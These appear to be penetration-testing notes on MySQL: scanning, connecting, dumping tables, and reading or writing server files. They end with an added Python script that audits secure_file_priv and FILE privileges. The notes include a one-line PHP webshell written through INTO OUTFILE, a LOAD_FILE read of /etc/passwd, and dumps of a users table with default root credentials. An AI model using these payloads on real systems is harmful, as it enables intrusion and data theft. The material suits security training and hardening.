### Footprinting
Scanning a MySQL server
```bash
sudo nmap <IP> -sV -sC -p 3306 --script mysql*
```
Interacting with the MySQL server
```bash
mysql -u root -h <IP>
mysql -u root -p<password> -h <IP> # no whitespace between -p and password
# ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain
mysql -u root -p<password> -h <IP> --skip-ssl
mysql -h $machine2 -u root -p --ssl-mode=DISABLED
# or (older client versions)
mysql -h $machine2 -u root -p --ssl=0
```
### DB Dump
```bash
# Dump an entire database
mysqldump -u <username> -p'<password>' -P <port> -h <ip> <database>
# Dump a single table
mysqldump -u <username> -p'<password>' -P <port> -h <ip> <database> <table>
# Dump specific records, e.g. only the rows whose username column contains the string admin
mysqldump -u <username> -p'<password>' -P <port> -h <ip> <database> <table> --where="username LIKE '%admin%'"
# Example: dump the whole users table from the production database
mysqldump -u root -p'root' -h 172.31.244.116 -P 33060 production users > user.sql.dump
# Example: dump only the rows of production.users whose username column contains the string davis
mysqldump -u root -p'root' -h 172.31.244.116 -P 33060 production users --where="username LIKE '%davis%'" > davis.dump
```
### Commands
| **Command** | **Description** |
| ---------------------------------------------------- | ----------------------------------------------------------------------------------------------------- |
| `mysql -u <user> -p<password> -h <IP address>` | Connect to the MySQL server. There should **not** be a space between the `-p` flag and the password. |
| `show databases;` | Show all databases. |
| `use <database>;` | Select one of the existing databases. |
| `show tables;` | Show all available tables in the selected database. |
| `show columns from <table>;` | Show all columns in the selected table. |
| `select * from <table>;` | Show everything in the desired table. |
| `select * from <table> where <column> = "<string>";` | Search for needed `string` in the desired table. |
### Write Local Files
MySQL has no stored procedure comparable to `xp_cmdshell`, but command execution can still be reached by writing a file into a location that the host will execute, for example a directory served by a web server that interprets PHP.
In MySQL, the global system variable `secure_file_priv` limits data import and export, i.e. the `LOAD DATA` and `SELECT ... INTO OUTFILE` statements and the `LOAD_FILE()` function. These operations are permitted only to users who hold the `FILE` privilege.
```sql
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
```
### `secure_file_priv`
- If empty, the variable has no effect, which is not a secure setting.
- If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
- If set to NULL, the server disables import and export operations.
In the example below the variable is empty, which means files can be read and written through MySQL (subject to the `FILE` privilege).
```bash
mysql> show variables like "secure_file_priv";
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
```
### Read Local Files
By default a MySQL installation does not allow arbitrary file reads, but when `secure_file_priv` permits it and the account holds the `FILE` privilege, files can be read as follows:
```sql
mysql> select LOAD_FILE("/etc/passwd");
```
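The `secure_file_priv` value and the `FILE` privilege together decide whether the write (`INTO OUTFILE`) and read (`LOAD_FILE()`) techniques above work at all, so a defender audits both. The script below is an added example, not part of the original notes: it parses the table output of `show variables like "secure_file_priv"` exactly as pasted above and the lines returned by `SHOW GRANTS FOR <account>`, classifies the setting according to the three cases listed above, and lists the accounts that hold `FILE` (explicitly or via `ALL PRIVILEGES`) together with the `REVOKE` statement that removes it. The sample outputs embedded in it are constructed; the function names are my own.

```python
"""Offline audit of the two MySQL settings that gate LOAD_FILE() and
SELECT ... INTO OUTFILE: the secure_file_priv variable and the FILE
privilege. Added example; sample inputs below are constructed."""

import re

# Constructed sample: the empty value shown in the notes above.
SHOW_VARIABLES_OUTPUT = """\
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
"""

# Constructed sample grants for three accounts (one line per SHOW GRANTS row).
SHOW_GRANTS_OUTPUT = [
    "GRANT SELECT, FILE ON *.* TO `app`@`%`",
    "GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` WITH GRANT OPTION",
    "GRANT SELECT ON `production`.* TO `reporting`@`10.0.0.%`",
]

# FILE is a global privilege, so only `ON *.*` grants can carry it.
GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO (?P<account>\S+@\S+)",
    re.IGNORECASE,
)


def parse_secure_file_priv(table_text):
    """Return the Value cell of the secure_file_priv row, or None if the
    row is missing. An empty string means the variable is unset."""
    for line in table_text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 2 and cells[0] == "secure_file_priv":
            return cells[1]
    return None


def classify_secure_file_priv(value):
    """Map the raw value to (severity, message) using the three cases
    from the MySQL documentation: empty, directory, NULL."""
    if value is None:
        return "unknown", "secure_file_priv row not found in output"
    if value == "":
        return "high", "secure_file_priv is empty: file import/export is unrestricted"
    if value.upper() == "NULL":
        return "ok", "secure_file_priv is NULL: import/export operations are disabled"
    return "medium", f"secure_file_priv restricts import/export to {value}"


def accounts_with_file_privilege(grant_lines):
    """Accounts whose global grants include FILE, directly or through
    ALL PRIVILEGES. Database-scoped grants are ignored."""
    hits = []
    for line in grant_lines:
        m = GRANT_RE.match(line)
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            hits.append(m.group("account"))
    return hits


def remediation(account):
    """MySQL statement that strips FILE from one account."""
    return f"REVOKE FILE ON *.* FROM {account};"


def audit(table_text, grant_lines):
    """Combine both checks into a list of (severity, message) findings."""
    findings = [classify_secure_file_priv(parse_secure_file_priv(table_text))]
    for acct in accounts_with_file_privilege(grant_lines):
        findings.append(("info", f"{acct} holds FILE; remediation: {remediation(acct)}"))
    return findings


if __name__ == "__main__":
    for severity, message in audit(SHOW_VARIABLES_OUTPUT, SHOW_GRANTS_OUTPUT):
        print(f"[{severity}] {message}")
```

Run it against real output by replacing the two constructed samples with captures from the server; the expected hardened state is `secure_file_priv` set to a dedicated directory (or NULL) and `FILE` held only by accounts that genuinely need bulk import/export.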